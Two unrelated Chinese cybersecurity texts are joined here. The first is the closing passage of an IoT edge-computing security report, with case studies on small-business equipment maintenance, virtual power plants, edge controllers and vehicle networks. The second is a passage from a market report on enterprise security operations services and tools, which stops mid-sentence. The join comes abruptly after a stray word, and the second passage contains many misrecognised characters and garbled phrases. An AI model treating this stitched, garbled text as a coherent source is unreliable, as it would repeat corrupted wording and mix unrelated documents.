需要建立恶意网络服务的黑名单,需要持续监听暗网, 及时 发现 0day 漏洞,应对有组织黑客攻击。 4.3.5 应用安全管理工作体系 需要建立应用安全的准入管理。对于自行开发的软件或委外开发 的软件,要建立全系统的代码审计和二进制代码扫描,避免引入不安 全代码和第三方库漏洞。 如边缘计算节点采用 P2P 更新模式,则更需要进一步区分测试环 境和生产环境, 建立更新回退机制, 控制因测试不充分的软件部署后 引发问题后的影响范围。 对于边缘计算节点应用软件和边缘计算平台,应开展国产化工作, 并纳入安全操作系统(SE LINUX),进一步建立严格的完整性保障和 访问控制,建立密码通信体系。 4.3.6 数据安全治理工作体系 数据安全治理工作,应结合国家的工业物联网数据分类分级工作, 在物联网边缘计算安全系统内部建立基于密码体系的数据标签工作。 完成数据标签化后, 建立面向数据分类分级的数据访问控制, 在 云边协同和云计算内部可部署数据防火墙、数据脱敏、数据库审计、 32 可信边缘计算推进计划 加密数据库等成熟产品;在物联网层面, 则尽量避免设备存储应用数 据, 因此可仅对配置文件进行直接加密存储。 5 物联网边缘计算安全防护案例 5.1 数据安全—— 面向小微企业的设备运维管理方案 为了解决小微企业设备运维数据不足的问题, 设备厂商构建基于 边缘学习的数据安全融合与交换模型,如图所示。设备生产厂商结合 其服务企业的经营行为, 采用纵向联合建模开展企业的设备运行数据 采集和运维预判。设备运维的数据可来自于企业部署在边缘计算环境 的数据中心, 在数据不离开企业边缘数据中心的情况下,通过边缘学 习获得智能运维所需的信息, 而无需获得小微企业的经营情况原始数 据。 使用边缘学习训练模型,在设备厂商机构指导下,运维机构和小 微企业借助数据安全融合与交换平台和边缘学习平台,利用各自的数 据一起训练模型,使用加密的中间结果进行交互,各自维护属于自身 的模型,并导入第三方数据进行训练。当需要预测的时候,再结合两 边的模型共同预测。整个模型训练的过程保证了数据和模型的安全性。 本案例数据流图如 0 所示: 可信边缘计算推进计划 ;; 图 5.1 物联网边缘计算数据安全 5.2 安全管控—— 虚拟电厂的安全防护 在虚拟电厂领域, 随着众多聚合商的设备连接到网络中, 大量的 终端需要进行数据采集和传输需求, 又由于虚拟电厂涉及到连接多个 分布式的能源系统, 需要跨部门和跨组织进行通讯,且目前针对虚拟 电厂的数据采集和传输目前都是利用公网无线传输,因此要加强边缘 设备的数据泄露和本体安全监测能力。 基于对资源层业务的柔性控制需求, 大量的物联设备接入需要对 资源层的终端和远程调控进行精准控制, 在边端的安全防护需进行纵 向数据可信传输、边缘侧的终端可信接入认证及数据的自适应安全访 问控制, 提升虚拟电厂的灵活可信组网和数据传输及边缘接入的安全 性。 34 可信边缘计算推进计划 本案例逻辑架构如图 5.2 所示: 图 5.2 虚拟电厂安全管理 本方案要点是资源层改造 RTU 设备嵌入 Agent 安全探针,聚合 层和调度集控层部署安全网关,调度直控侧建立虚拟加密通道,实现 认证、加密、访问控制,以及边端设备的本地安全管控要求。 针对涉控指令的数据安全性、数据完整性、数据真实性进行安全 校验,保障数据的加密传输和指令安全下发, 实现对虚拟电厂涉控终 端的“ 可观、可测、可控”。 构建虚拟电厂的全场景安全风险态势感知,基于本体的数据要素 知识库和终端身份库模型,实现终端接入的风险检测、行为基线合规、 违规外联告警、供应链风险检测等,实现针对边端设备可信接入展示、 漏洞风险统计、数据安全分析, 提升整体智慧电厂的物联安全体系建 设。实现终端运行风险展示、终端漏洞风险展示、终端攻击行为展示、 终端运维安全风险、 自适应安全动态拦截可疑指令、本体固件漏洞检 可信边缘计算推进计划 35 测、数据传输安全加密、终端违规外联告警、终端基线合规检测,终 端接入安全准入。 5.3 业务连续性保障—— 可编程边缘控制器安全保障 随着边缘计算技术的成熟,原来的车间层面的控制监控的单点风 险点问题有了解决方案。 在原来工控系统场景中,车间层面控制室的操作员站可直接对工 艺控制系统进行监督和控制, 一旦发生车间控制室遭到网络安全入侵, 监控设备瘫痪,则必须立即停止当前控制系统。 为解决控制室的单点故障风险问题, 可以首先对所有控制操作进 行原子化, 在车间层面部署边缘计算节点, 边缘计算节点可对原子化 的控制操作进行编程实现本车间特定的控制工艺。为实现高产值控制 系统的业务连续性保障,边缘节点可以存储整个工厂的所有车间的已 编程控制工艺,然后通过激活当前车间控制工艺进行生产。 此时只需要在边缘平台层面对每个边缘节点的可用性进行监控, 对边缘节点控制过程数据进行采集分析, 就可以及时发现问题边缘节 点, 然后通过自动化调度, 通过临近边缘节点激活相关工艺,就可以 继续对该问题车间的控制过程继续监控。从而实现, 即使某一车间的 监控系统失效时, 其他车间可继续承担监控工作,使得该问题车间的 检修不会导致生产的停止。 36 可信边缘计算推进计划 图 5.3 可编程边缘控制系统数据流图 在这样的场景下,主要安全风险, 是边缘计算节点的异常发现和 生产过程的异常发现。 我们采取了以下措施: 1) 边缘节点白名单管理:在边缘网络管理平台,严格记录每 个节点的完整性检验标签、管辖范围和网络访问控制。从 边缘网络管理平台发起轮询,实时检验边缘节点的完整性 和可用性。 2) 生产过程异常发现:边缘节点除完成业务功能外, 还需要 能够根据自身的业务数据, 训练人工智能学习引擎,形成 设备业务数据画像,从而能够利用训练成果对设备的下一 步的业务数据进行预算, 并比对实际数据进行研判,判断 设备生成的业务数据是否符合该设备的业务数据画像,一 旦发现不符合,即可进行报警,进一步落实运维人员巡检 确认。 通过这样的业务和安全的双重保障,可使得本案例可以支持高业 务连续性要求的生产工作,大大强化控制系统的网络安全防御纵深。 可信边缘计算推进计划 37 5.4 可信计算—— 车联网安全 车联网作为物联网在交通领域的典型应用,内容丰富,涉及面广。 基于“ 云” 、“ 管” 、“ 端” 三层架构, 网络安全视角下的车联网如图 5.4 所示: 图 5.4 车联网安全框架 l 车联网的安全防护的风险 云端风险:车联网云端平台对外需组合第三方应用、开放 API 接 口,对车联网终端及各类 IT 基础设施进行授权、认证、 资源分配和 管理等。网络各终端节点设备可能来自多个厂商,硬件结构、 软件配 置、协议标准和安全机制目前都没有统一的标准,容易受到外部攻击。 传输威胁:车联网数据在车、移动 APP 、汽车钥匙、路测通信设 备、各类管理平台之间都有大量数据交互,基于这些数据进行实时反 应; 各节点之间的传输协议有 5G、LTE-V2X、802.11p、卫星、蓝牙、 Wifi 等, 多种传输都需要保证安全可信。 车载终端和其他外部威胁:车联网中汇聚到边缘设备的信息会涉 38 可信边缘计算推进计划 及车辆安全和用户隐私,任何终端节点受到攻击,都可能会对车、车 主乃至于整个网络造成较大影响。车载终端有 OBU、T-BOX、OBD 、 ECU 等,而路测有传感器、边缘设备; 另外,新能源车离不开充电桩, 移动 APP 和多功能钥匙也成为了必备应用,智能车本身也自带各种 复杂的多传感器、网联娱乐系统及辅助设置,这些组件把源生的安全 问题带入车联网系统。 l C-V2X 车联网系统安全实践 目前国内车联网主要是围绕 C-V2X 协议进行车路协同,实践中 主要围绕车路云协同场景,采用了物理可信根(国密可信芯片)、动静 态可信启动、操作系统可信加固(三权分立、进程保护、应用白名单管 控)、可信远程访问控制、可信传输(PKI 证书管理和 KMS 密钥管理)、 异构可信安全管理中心等信息安全技术。架构图如图 5.5 所示: 可信边缘计算推进计划 39 图 5.5 C-V2X 系统可信安全架构 ‘ 总结和展望 在物联网边缘计算场景中, 网络安全重点在白名单策略, 即强化 入网设备的原生安全和准入控制, 通过人工智能的白名单设备网络行 为画像来监测入网设备的通信行为。同时也要辅之以黑名单技术, 通 过安全产品厂商对攻击者的跟踪形成的威胁情报,对流量内的恶意行 为进行监控。由于可以重新引入对局部物联网进行监管的边缘安全网 关和边缘安全计算节点, 使得密码技术可以引入到物联网体系中, 这 样建立起来的边缘节点之间、边云协同网络之间的加密通信网络, 不 仅可以提高在互联网上传输信息的安全性, 也可以使得物联网终端产 品无需变更,即可得到边缘安全网关的加密技术支持。 总体来讲,物联网边缘计算的技术已经进入大规模应用的前夕, 安全防护体系所需技术也是成熟的,但是仍然需要我们从体系建设层 面对物联网边缘计算安全框架进行物联网终端管理体系、密码通信体 40 可信边缘计算推进计划 系、网络安全监控体系的建设, 并针对物联网终端需要, 开发专用的 边缘安全网关和边缘安全计算节点, 从而使得物联网边缘计算的整体 安全防护能力能够得到有效的提升。
standards
在我国网安产业近三十年发展过程中,网络安全法实行超过6年、 等级保护制度实行接近20年,这两项网安普适性法律法规已对企 业网络安全建设产生重要且实质性的影响。目前看,多数企业已 完成合规建设,基础安全体系搭建完成,未来将进入深耕细作、 建设与运营并重的新阶段。 ◆ 数字应用爆炸式增长导致企业安全风险暴露面不断扩大,网络威 胁态势日益严峻。安全运营可以帮助企业将安全技术、安全人员 与安全管理制度进行高效聚合,实现更为主动、快速、贯穿全局 的防御能力。安全运营已成为海内外广泛认可的重要发展方向, 未来也将成为绝大多数企业安全能力提升过程中的核心工作。 ◆企业安全运营需求的快速释放也推动了安全运营市场蓬勃发展。 安全运营涵盖范围非常广,主要由安全运营产品、安全运营服务 和安全运营应用场景构成,不同应用场景所需要的安全运营产品、 安全运营服务以及服务的模式可能存在差异。 缺乏安全运营的静态防御模式无法有效应对不断演进的同络安全成胁:国内大多数企业在构建安全体系时主要以满足合规要求作为第一导 向,采购大量安全产品并堆叠部署已成为常态。然而,在这种背景下,各安全产品间常常孤立运转,缺乏有效的协同联动能力,企业整体安 全策略与防御姿态长期处于静止和被动的状态,难以有效应对日益复杂和精细化、平台化、自动化的网络攻击,企业迫切需要建立动态、主 动的安全运营体系,以达到有效防护的目标。 ◆ 攻防不对等性导数企业难以实现100%绝对的安全; 攻击者在暗而防守者在明,防守方需要耗费大量资源部署长长的防线来保护庞大的网络 资产,攻击者只要在100次攻击中成功1次,就可以抵消防守方在99次成功防守中所付出的努力。因此,企业在构建安全防线时,盲目的建 设防线并不是最优的选择,更好的办法是在安全运营过程中时刻感知威胁与风险,采用更具针对性、动态的安全策略,并不断加强防御系统 的韧性,保证即便发生攻击或系统被攻破,也能够及时发现、阻断攻击并快速恢复业务。 ◆ 企业在同络安全投入上画临预算压力和资源展们: 对于一些企业来说,很难衡量网络安全投资的回报率 (ROI), 这导致它们在网络安全方 面只拥有有限的预算和资源,同时也可能限制其采购和实施最新的安全技术和措施。因此,企业需要找到一种平衡,通过建立高效的安全运 营体系,帮助企业最大程度提高系统的安全性,同时实现在有限资源下进行有效管理。 通过技术设施安全评估,技术设施安全加固,安全漏洞补丁 通告、安全事件响应以及信息安全运维咨询,协助组织的信 息系统管理人员进行信息系统的安全运维工作,以发现并修 复信息系统中所存在的安全隐患,降低安全隐患被非法利用 的可能性,并在安全隐患被利用后及时加以响应。 安全意识和安全技能培训;资产识别和管理;脆弱性识别和 管理;应急响应及处理能力;深度威胁检测、研判和管理; 安全事件预警与取证分析;风险评估的能力;内部审计和威 胁情报处置;态势感知和趋势分析;维护安全运营中心 (SOC) 工具生命周期;安全性协调的能力;检验并证实整 体安全性。 数说安全对安全运言的定义 结合行业主管部门对安全运维的定义和安全运营能力过程要求,数说安全对安全运营定义如下: 安全运营是通过统一和协调组织内安全人员、安全技术和安全管理流卷,对组织画临的安全风险进行预誉, 识别、保护、检测、响应的过看,安全运营的目标是发现组织已存在或未来可能会出现的安全风险,并利 用高效的安全防控措单来主动化解风险,以此不断改善组织的安全状况。 组织具有成熟的安全体系,安全管理流程、安全人员、安全技术均 由组织自建自筹; ◆ 组 织CSO (首席安全官)对本组织的安全运营情况和效果负责; ◆组织具备充足的安全预算,已建成体系化的安全架构,拥有专业的 安全运营团队,安全运营是保障组织业务发展的重要因素。 ◆目前在市场中,采用完全自建模式的客户比例不超过3%。 组织通过安全集成的方式购买安全产品并建立安全防护体系,但组 织内安全人员有限,需要以人力外包的方式补充安全运营人员; ◆ 组 织CSO (首席安全官)对本组织的安全运营情况和效果负责; ◆组织安全预算相对充足,但预算优先投入安全技术体系建设,拥有 相对成熟的安全管理流程,但受限于组织体制、技术能力与人员编 制控制等原因,无法自建完整的安全运营团队。 组织建立了安全防护体系,但没有独立的安全运营团队,也不具备 安全运营能力,需要将安全运营工作委托给外部专业的安全公司; ◆受委托的安全公司针对组织面临的安全需求,制定组织安全管理流 程、配备安全运营人员、提供安全运营工具,以云端/远程的交付方 式实现对组织安全运营工作的全面托管,并对最终的效果负责; ◆组织安全预算有限,短期内不具备自筹自建安全运营体系的能力。 除基础安全运营工作外,组织更关注自身面临的网络攻击与威胁, 但组织不具备相应的技术能力,需要将威胁检测、威胁分析、威胁 响应等工作委托给外部专业的安全公司; ◆受委托的安全公司为组织提供面向威胁视角的托管式安全服务,包 括部署威胁检测探针、威胁分析和响应平台等基础设施,并在云端 配备安全专家,为组织提供7*24小时的威胁检测与响应服务。 成熟的安全运营将打破传统网络安全管理的模式,在管理制度和管理流程基础上,进一步采用科学的数字化管理指标,通过 风险平均检测时间(MTTD)、平均确认时间(MTTA)、平均遏制时间(MTTC)、平均恢复时间(MTTR)等多项指标量化 安全运营过程和结果,从而达成更精细、可度量的安全管理能力。 安全运营通过威胁情报预测、主动监控、安全测试等多样化手段,提前发现企业可能面临的安全风险和威胁,自适应调整对 抗策略,降低企业发生网络安全风险的可能性。同时,在风险发生时,安全运营可以实现快速的风险定位,通过体系化的安 全运营流程来化解风险,在减少企业损失的同时不断强化实战能力。 国内以合规为导向的市场供需关系导致企业购买了很多安全产品,但并未通过技术有机结合形成有效的体系化能力,安全运 营可以在弥补企业管理能力与技术能力的同时,合理规划安全需求与安全投入,实现物尽其用,减少冗余和重复性投资,以 此降低企业整体的安全成本。 企业安全投入与产出不匹配是我国网安产业一直以来面临的突出矛盾,其主要原因在于长期形成的堆叠式安全体系,在没有 良好的管理和运营的情况下,无法带来令人满意的安全价值。2016年开始的实网攻防,其目的也是解决让企业看到安全价值 的问题,安全运营未来将进一步加速这个价值平衡的过程。 第十八章第三节:加强网络安全保护,健全国家网络安全法律法规和制度标准,加强重要领域数据资源、重要网络和信息系统安全保障。建立健全关键信息基础设施保 护体系,提升安全防护和维护政治安全能力。加强网络安全风险评估和审查。加强网络安全基础设施建设,强化跨领域网络安全信息共享和工作协同,提升网络安全威 胁发现,监测预警、应急指挥、攻击溯源能力。加强网络安全关键技术研发,加快人工智能安全技术创新,提升网络安全产业综合竞争力。加强网络安全宣传教育和人 才培养。 第4条创新安全服务模式 ◆加强安全企业技术产品的云化能力,推动云化安全产品应用,鼓励综合实力强的安全企业发展弹性、灵活的云模式网络安全服务。 ◆发展集约化安全服务,鼓励企业提供集防火墙、用户身份认证、数据安全、应用安全等一揽子整体解决方案。支持开展威胁管理、检测响应等安全托管和咨询服 务。发展地区级,城市级、行业级安全运营服务,提高运营自动化、流程化、工具化水平。 ◆鼓励基础电信企业、大型云服务提供商,并充分发挥网络和基础资源优势,输出安全服务能力,同时升级改造基础设施,支持安全企业嵌入安全服务能力。 ◆第9条推动关键行业基础设施强化网络安全建设 ◆推动能源、金融、交通,水利、卫生医疗、教育等行业领域加强资产识别,设备防护、边界防护、身份认证、数据安全,应用安全等技术手段建设,提升重要系 统、关键节点及数据的安全防护能力。 ◆支持建立态势感知、通报预警、应急响应、安全运营等安全机制及纵深防护体系,不断提高风险防范和应急处置能力。 ◆推进零信任、人工智能等技术应用,提升防护体系效能。 ◆第10条推进中小企业加强网络安全能力建设 ◆实施中小企业“安全上云”专项行动,建设网络安全运营服务中心,面向中小企业提供高质量、低成本、集约化的网络安全产品和服务。 ◆引导中小企业通过网络安全产品服务一站式购买、租赁、订阅、托管、云端交付等方式,灵活部署网络安全产品和解决方案。支持开展多元化网络安全意识宣贯 和技能培训,不断提升中小企业网络安全防护意识和能力。 第二十五条:网络运营者应当制定网络安全事件应急预案,及时处置系统漏洞、计算机病毒、网络攻击、网络侵入等安全风险,在发生危害网络安全的事件时,立 即启动应急预案,采取相应的补救措施,并按照规定向有关主管部门报告。 ◆第五十一条:国家建立网络安全监测预警和信息通报制度。国家网信部门应当统筹协调有关部门加强网络安全信息收集、分析和通报工作,按照规定统一发布网络 安全监测预警信息。 ◆第五十二条:负责关键信息基础设施安全保护工作的部门,应当建立健全本行业、本领域的网络安全监测预警和信息通报制度,并按照规定报送网络安全监测预警 信息。 第二十二条:国家建立集中统一、高效权威的数据安全风险评估、报告、信息共享、监测预警机制。国家数据安全工作协调机制统筹协调有关部门加强数据安全风 险信息的获取、分析、研判、预警工作。 ◆第二十九条:开展数据处理活动应当加强风险监测,发现数据安全缺陷、漏洞等风险时,应当立即采取补救措施;发生数据安全事件时,应当立即采取处置措施, 按照规定及时告知用户并向有关主管部门报告。 第二十四条:保护工作部门应当建立健全本行业、本领域的关键信息基础设施网络安全监测预警制度,及时掌握本行业、本领域关键信息基础设施运行状况、安全 态势,预警通报网络安全威胁和隐患,指导做好安全防范工作。 网络安全技术的有效运用是提升企业安全运营效率、保障企业安全运营效果的核心手段。在安全运营技术栈中,安全运营平台是必不可少的基础性平台,除了承载企业安全运营 管理的自动化流程,也是构建SIEM、XDR、SOAR、TI 这4项安全运营核心能力的底座平台。SIEM 是传统的安全信息和事件分析技术,XDR 是更为先进的威胁检测技术,SOAR 在 安全运营事件的响应处置中不可或缺, TI是常态化安全运营状态下最重要的数据支撑。在构建基础平台与核心能力后,企业可以根据不同的安全需求,有选择性的使用十余种敏 捷工具,来不断细化、落实安全运营工作,实现更自动化、智能化的安全运营体系。 最初的SIEM平台是日志管理工具,结合了安全信息管理和安全事件管理,能够实时监控和分析安全相关事件,以及跟踪和记录安全数据以进行合规或审计。近些年SIEM 不断发展,融合了用户和实体行为分析 (UEBA) 以及其他高级安全分析、人工智能和机器学习能力,用于识别异常行为和高级威胁。如今SIEM已成为现代安全运营中心 中安全数据监控与处理的中枢,帮助企业实现更全面、精准的事件分析与管理能力。 ◆ SIEM从本地和云环境中,采集包括用户、终端、网络、应用程序、云工作负载等多类IT和安全基础设施的数据,通过对这些多源数据进行聚合、富化、关联和建模,实 现对威胁的调查,并生成准确的安全事件,为企业在安全数据层面提供整体安全视图和决策支撑。SIEM是企业构建安全运营体系最核心的底层能力。 随着移动办公、5G 和物联网技术的发展,海量终端设备接入到网络,攻击面不断被拓宽,攻击事件呈现指数增长态势,使得安全运营团队承受着极大的压力。借助于 SOAR 产品,可以根据安全事件的分类/评估结果,关联不同类型的处理脚本,进行自动化的事件响应,帮助安全运营团队的工作效率实现指数级提升,有效应对不断攀 升的漏洞和安全告警。 ◆在安全运营场景下,SOAR 是最重要的核心技术之一,通过接收高置信度的分析结果,SOAR 可以将人工处理过程转化为自动化的剧本/工作流,大幅缩短从发现威胁到处 置威胁的时间。 XDR 平台可以跨区域收集来自多种安全设施的检测数据,并对其进行统一的集成、关联和上下文等事件化分析,以全局视角进行威胁研判,从而获得更准确和全面的检测 结果。XDR 旨在高效集成产品,打破信息孤岛,降低企业内的无效告警和安全运营成本。 ◆在合规背景下,企业安全体系普遍存在产品碎片化、告警信息繁杂、事件响应流程混乱、人员能力不足等深层问题。如何通过安全运营体系一体化整合来提高安全运营效 率,成为目前亟待解决的核心问题, XDR 或在此方面形成技术突破,并对多场景常态化安全运营工作提供最直接的安全价值。 各产品信息孤立,缺少关联分析,难以发现APT 等 高级威胁; ◆ 各检测点产生大量告警信息,安全运营工作效率低、 负担重; ◆ 各品牌和各类型产品独立配置和维护,管理成本高。 产品同品牌,各产品信息互通可读,由XDR 平台统 一分析; ◆ 摒弃繁杂的告警信息,而是精准少量的安全事件, 效率提升; ◆ XDR 平台可整合TI、SOAR 等能力,并支持SaaS 运 营 模 式 。 威胁情报是基于威胁知识、证据、技能和经验的信息集合,可以对已存在和正在出现的威胁和风险提供上下文、机制、可能产生的结果和应对意见等信息。这些信息可被 用于及时响应和优化风险应对的决策。威胁情报可以帮助企业更好地洞察威胁形势和攻击行为,以及攻击者最新的策略、技术和程序,为企业提供决策依据和先发优势。 通过广覆盖和高时效的威胁情报,企业可以主动、快速调整其安全防御策略,从而识别和抵御高级攻击、0 Day 等安全风险。 ◆在滑动标尺模型中,威胁情报定位于态势感知和积极防御之上,是填补已知威胁知识缺口并驱动积极防御的过程。威胁情报的posture, 是覆盖面、时效性和可执行水平。 终端检测与响应技术在IT端点部署轻量级代理采集终端信息并上传中心数据分析平台,通过大数据、机器学习、威胁情报、UEBA 等新技术实现对终端安全态势的研判分 析,是针对日渐多变的高级持续性威胁、O Day等新兴未知攻击的主动性防御机制。 ◆终端检测与响应技术在网络安全运营中同样扮演着关键的角色,其重要性和价值包括:实时监测终端上的活动,在快速检测和识别潜在威胁的同时可以将监控数据同步 给安全运营中心,通过在终端采集的详细事件日志和活动记录,安全运营团队可以对安全事件做进一步根因分析。除此外,通过与SOAR、威胁情报等能力整合,终端 检测与响应技术可以实现对终端风险的实时预警和快速处置。 网络检测与响应NDR 技术是在传统特征检测基础上,利用Al、ML、大数据等核心功能对网络流量进行建模和深度学习分析的过程,对识别到的异常行为进行流量还原、 关联分析,并结合威胁情报来定位未知威胁,在网络层面实现对内网安全风险的实时监控,最终为安全运营处置提供信息支撑。 ◆ 网络检测与响应与终端检测与响应技术的协同,可以大幅提升企业在安全运营工作中对未知威胁的识别与防御能力,也是未来支撑SOC、SIEM、SOAR 等系统高效应用 的重要前提。目前在企业安全运营体系构建中,已经有越来越多的客户使用NDR作为网络流量采集和检测的主要产品。 企业购买防火墙、防病毒软件、IDS、WAF、 蜜罐等大量安全产品,设计严密的网络安全架构,但整套体系和设备是否如用户预期运行?如果网络攻击下一刻到来,管理 者是否能看得见、防得住、抓的着?目前还没有一项完美的技术可以解决这些问题,但至少入侵与攻击模拟迈出了第一步。 ◆ BAS通过主动验证+(半)自动化的方式,利用攻击者的战术、技术和程序来模拟杀伤链的不同阶段,持续测试和验证现有网络整体的安全机制(包括各安全节点是否正 常工作、安全策略与配置的有效性、检测/防护手段是否按预期运行等),对企业对抗外部威胁的能力进行量化评估,并强化实战能力,最终实现安全运营工作降本增效。 攻击面是指企业所有可被利用的风险因素的集合,这些风险因素大多分布在物理面(例如端点、网络、服务器等设备漏洞)和数字面(例如企业数据泄漏、品牌侵权、 个人隐私信息泄漏、网络钓鱼等)。攻击面管理旨在识别、分类这些风险因素,并对其进行优先级排序和持续监控。 ◆攻击面管理是持续发现、分析、监控和评估内部和外部资产以发现潜在暴露面、攻击向量和风险,并进行优先排序、响应处置的过程。因为攻击面范围较为宽泛,按 照企业管理者和外部攻击者两个不同视角,可分为网络资产攻击面管理 (CAASM) 和外部攻击面管理 (EASM) 两种。 欺骗技术面向企业网络及横向移动下的威胁检测场景,通过对企业网络结构、操作系统、应用系统、文件、容器、微服务、甚至是IoT设备的高度仿真来增加企业IT设 施 的密度,最大限度增加被攻击者触碰的机会来诱导攻击者主动现身并陷入圈套,欺骗系统发出的告警信息,其置信度通常较高,是有别于传统检测手段、可以大幅提升 企业安全检测能力的高级检测技术。 ◆欺骗技术在安全运营中的主要价值包括误导并诱捕攻击者、攻击分析与研究、威胁情报生成、攻击溯源取证等,是高级别安全运营场景的重要技术。 主要面向使用自身“云”“网”服务的中小企业客户,在较强的网络资源、数据资源和算力资源基础上,通过生态合作、 产品集成、自主研发等方式补充安全能力,形成“云网安”一体化服务能力,为中小企业提供轻量级的增值安全运营服务, 在客户数量上远超其它类型的服务商。 在网安厂商中主要包含两类:第一类是具有成熟安全产品和安全服务能力的综合型安全厂商,针对不同的应用场景和用户需 求,可以提供多样化的安全运营服务模式;第二类是以自研SOC/SIEM/XDR等平台为主的产品型厂商,在技术创新性、场景 适应性、产品易用性等多方面具备优势,可以为市场主要的安全运营服务商提供能力支撑。 具备较强的一线经验,服务专业化水平高,保障用户最后一公里安全。在熟悉用户IT架构、业务流程、管理制度等情况下, 可以近距离对用户的IT、网络、安全提供全方位服务,达成更好的服务效果和满意度。在安全运营服务市场供需关系中,系 统集成商和安全服务商是重要的角色之一,同时也是MSS安全托管服务商主要的合作伙伴。 安全运营服务是以时间为服务计价单位,为企业持续提供保障性安全服务的过程。下面列举了国内安全运营类招标项目中最为常见的用户需求,其中用户需求最高的服 务有:应急响应、风险评估、漏洞管理、等保相关服务、驻场运维、基础安全服务。 ◆在这些需求中,有一些已经可以通过自动化的方式实现,但仍有一些需求还需要人工现场参与。虽然安全运营服务在朝着集约化、智能化、低成本方向发展,但从当前 多样化的市场需求来看,国内安全运营服务尚不能做到完全离场式的托管模式,到场的安全运营服务仍然占据一定比重。 驻场运维服务是由传统安全集成业务自然延伸出现的服务形式,也是有安全预算、但苦于没有人员编制情况下甲方通常采用的形式。驻场运维服务是存量客户最多的 安全运营服务子市场,对于以提供驻场运维为主的服务商来说,有以下4个共性特点: 1. 劳动密集型:由于需要1对1和5*8驻场服务,服务商需要配备更多的服务人员,才能实现更好的客户覆盖; 2. 跨区域服务挑战大:由于人员差旅、地域文化和工作方式差异,跨区域的项目可能不赚钱,服务商更聚焦于区域内用户,很少参与区域外的项目; 3. 引入更多自动化平台和工具:因为“卖人头”模式投入产出比有限,服务商逐渐开始自研服务平台和工具,提高服务交付过程中自动化的比重,以达到更高的 人效比,实现业务利润率提升; 4. 服务要求细化升级:由于政策与监管力度持续加强,客户对驻场运维服务的要求也开始从被动防御、静态防御、监测告警服务级别向主动防御、动态防御、态 势感知目标转变,并且愿意为这些增值的安全运营服务付费,服务商也在不断推动自身能力向安全运营服务能力转型。 ◆ 虽然国内安全托管服务市场持续发展,但从国内客户使用习惯、接受度、核心需求、安全制度等方面来看,驻场运维服务仍可能是未来几年内市场中的主要需求。 安全托管服务(Managed Security Services,MSS)是一种新型的安全运营服务模式,企业委托专业的第三方MSS 服务商全面管理其网络安全。典型的MSS 模式依托于服务 商可远程交付的安全托管运营中心,通过远程收集企业的安全数据,实现对企业网络安全风险的实时监测、分析、研判和响应。典型MSS模式不再依赖现场服务人员,而是以 远程方式提供服务,可实现全年7×24小时的覆盖,并将服务商更专业的安全技术、安全人员和安全管理流程聚合到服务中,超越了传统现场服务、依靠个人能力的局限,给企 业带来更高时效、更具性价比的安全运营价值。 典型的MSS 服务侧重于管理和维护企业与安全相关的技术和产品,以保障企业T 基础设施稳定运行为目标, MDR 服务则以更高的视角聚焦攻击与威胁,通过云网端数据 共享与分析,提升企业在威胁检测与响应处置方面的能力。 ◆从国内市场需求来看,由合规、实战和效果多驱动因素叠加,客户在选择MSS 服务时,通常针对重要的IT资产和应用系统也会要求提供高级别MDR 服务,而从供给侧来 看,为了提升MSS 服务价值,增强市场竞争力,MSS 服务商也在不断细化和升级服务内容,推出配套的MDR 服务。未来随着供需两侧的这种变化, MSS 和MDR 服务将延 续融合的趋势,对于MSS服务商来说,也同时需要兼备MDR服务能力。 安全托管服务 (MSS) 在国内已有多年发展历程。随着客户的安全意识从合规转向实战,越来越多的客户逐渐转向购买安全服务而非仅购买安全产品,这使得MSS 市场在国内 得到了广泛认可。由于信任机制、安全制度、保密要求不同,国内安全托管服务呈现了3种主要服务模式,国外主流的、数据可出网的SECaaS 运营模式在国内仍主要应用在中 小企业和对安全数据外发不敏感的用户场景,国内网安头部和绝大多数政企类客户依然青睐在保证安全数据不出网前提下,采用远程托管或本地托管的运营模式。 MSS典型服务模式,国外主流模式,即企业允许安全 数据离开本地网络,远程接入到服务商远端的安全托 管运营中心,并由MSS服务商安全运营团队实施远程 管理,该模式应用的前提是企业安全数据可出网, 远程托管运营模式 企业不允许安全数据离开本地网络,MSS服务商将 安全托管运营中心部署在企业本地,运营人员通过 VPN、云桌面等方式接入进行远程管理。该模式既能 满足企业安全要求,也能实现集约化运营。 本地托管运营模式 客户对自身安全数据的保密要求较高,同时预算充 足,也愿意为本地驻场安全运营服务付费,MSS服 务商在客户本地部署安全运营中心的同时也派驻专 职安全运营人员。 定制化+服务化 以风险前置为主的安全运营 绝大多数只接受本地托管运营模式 合同额可达百万级/年 不同行业/区域需求差异较大 以闭环管理驱动的安全运营 政企客户 多数为本地或远程托管运营模式 合同额通常在20万-50万/年 低成本+标准化 以防御为主的安全运营 绝大多数接受SECaaS 托管运营模式 合同额通常在10万以下/年 城市级安全运营是一个关键的网络安全枢纽,旨在为城市提供高水平的网络安全保护和响应能力,确保城市的网络基础设施和重要机构不受网络威胁的影响。这种安全 中心的建立有助于提高城市的整体网络安全防御能力,以应对不断演变的网络安全威胁。 ◆城市级安全运营主要面向两大类城市级业务场景, 一个是面向智慧城市场景群的安全运营, 一个是结合地方产业特点、面向各类IT产业园的安全运营。在城市级安全运 营项目中,供需两端均具有较强的资源统筹和项目转化能力,但随着市场稳步深入发展,供给端竞争强度也在不断上升。 ◆城市级安全运营中心建设模式主要有地方产业规划驱动的安全企业自建模式和市场需求驱动的政企联合共建模式,从实际情况看,企业自建模式逐渐减少,更多企业选 择联合共建模式。 行业级安全运营是指针对特定行业量身定制的网络安全运营服务,不同行业面临不同的安全威胁和挑战,行业级安全运营可以结合各行业特点制定不同的安全运营策略和 内容,并提供专业的服务以保障行业关键信息资产和数据的安全。行业级安全运营的核心在于深入理解各行业特性和核心业务流程,根据行业特点和不同监管要求,构建 适合该行业特定环境的安全运营体系。 ◆在安全托管服务市场中,政府、教育和医疗卫生行业是核心的客户群体,每个行业都有其特定的安全风险和需求。政府行业信息通常涉及国家安全和公共利益,因此其安 全运营服务需高度本地化,以确保敏感数据严格限制在政府网络内部流转。教育行业,作为挖矿木马的高发区,迫切需要MS5重点关注内网的病毒感染及其横向扩散。医 疗卫生领域则强调MSS 应在保障其业务连续性的前提下,提升对勒索病毒的防御能力。 2018年-2022年,安全管理平台和其它具备较强安全运营属性的产品均呈现出较快的增长速度,5年复合增长率远超传统网安产品,且表现出抱团上升趋势,客户采购 偏好发生显著变化。同时在2022年,安全管理平台市场需求非常旺盛,成为继防火墙、堡垒机、上网行为管理后的第四大单品市场。经过二十年发展,我国网安产业开 始进入到建设与运营并重的新发展阶段。 ◆在这5年间,安全运营产品也表现出不同的发展态势。其中安全管理平台有持续、明确的市场底量,近5年市场稳步增长。网络检测与响应市场在经历2020年高增长后 